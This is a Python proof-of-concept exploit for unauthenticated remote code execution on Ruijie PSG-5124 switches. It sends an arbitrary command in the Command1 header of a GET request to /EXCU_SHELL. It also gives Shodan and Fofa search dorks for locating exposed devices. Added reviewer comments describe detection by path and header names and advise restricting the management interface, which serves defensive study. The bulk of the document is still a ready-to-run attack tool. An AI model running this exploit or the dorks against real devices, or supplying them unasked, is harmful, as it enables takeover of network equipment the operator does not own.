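#- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)
#- Shodan Dork: http.html_hash:-1402735717
#- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif"
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Version: PSG-5124(LINK SOFTWARE RELEASE:26293)
#- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293)
#
# Reviewer notes (defensive reading of this proof of concept):
# - The whole interaction is one plain-HTTP GET to /EXCU_SHELL. The command
#   is carried in the `Command1` request header, next to `Cmdnum` and
#   `Confirm1`. The request carries no cookie, token or Authorization
#   header, which is consistent with the title's claim that this release
#   executes the command without a login.
# - Detection: any request for the path /EXCU_SHELL that reaches a switch
#   management interface from outside the administration network is worth
#   an alert. Header values are frequently not logged, so match on the path
#   first; because the traffic is unencrypted HTTP, a network sensor can
#   also match on the `Command1` / `Cmdnum` header names.
# - The User-Agent below is a fixed Firefox 121 string. It is a weak
#   indicator at best, since a client can send any value.
# - Mitigation: keep the web management interface reachable only from a
#   dedicated management network or an ACL-restricted source range. This
#   page names no fixed firmware release; check the vendor's advisories
#   for one.

import http.client
import argparse


def send_request(ip, port, command):
    """Send one GET /EXCU_SHELL request with `command` in the Command1 header.

    The status code and the response body are printed to stdout; nothing is
    returned. Any failure (bad address, refused connection, timeout,
    undecodable body) is reported as "Request failed: ..." rather than
    raised.

    Args:
        ip: Address of the device under test.
        port: TCP port of its web management interface.
        command: String placed verbatim in the `Command1` header.
    """
    headers = {
        "Host": f"{ip}:{port}",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "DNT": "1",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
        # The three headers below are what the endpoint consumes; the rest
        # of the header set only imitates a browser.
        "Cmdnum": "1",
        "Confirm1": "n",
        "Content-Length": "0",
        "Command1": command
    }

    connection = None
    try:
        # A timeout keeps the script from blocking forever on a host that
        # accepts the connection but never answers.
        connection = http.client.HTTPConnection(f"{ip}:{port}", timeout=10)
        connection.request("GET", "/EXCU_SHELL", headers=headers)
        response = connection.getresponse()

        print(f"Status Code: {response.status}")
        print(response.read().decode('utf-8'))
    except Exception as e:
        print(f"Request failed: {e}")
    finally:
        # Close on every path; the original leaked the socket whenever the
        # request or the read raised.
        if connection is not None:
            connection.close()


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='proof of concept for ruijie Switches RCE')
    parser.add_argument('--ip', help='Target IP address', required=True)
    parser.add_argument('--port', help='Port', required=True)
    parser.add_argument('--cmd', help='Command', required=True)

    args = parser.parse_args()

    ip = args.ip
    port = args.port
    command = args.cmd

    send_request(ip, port, command)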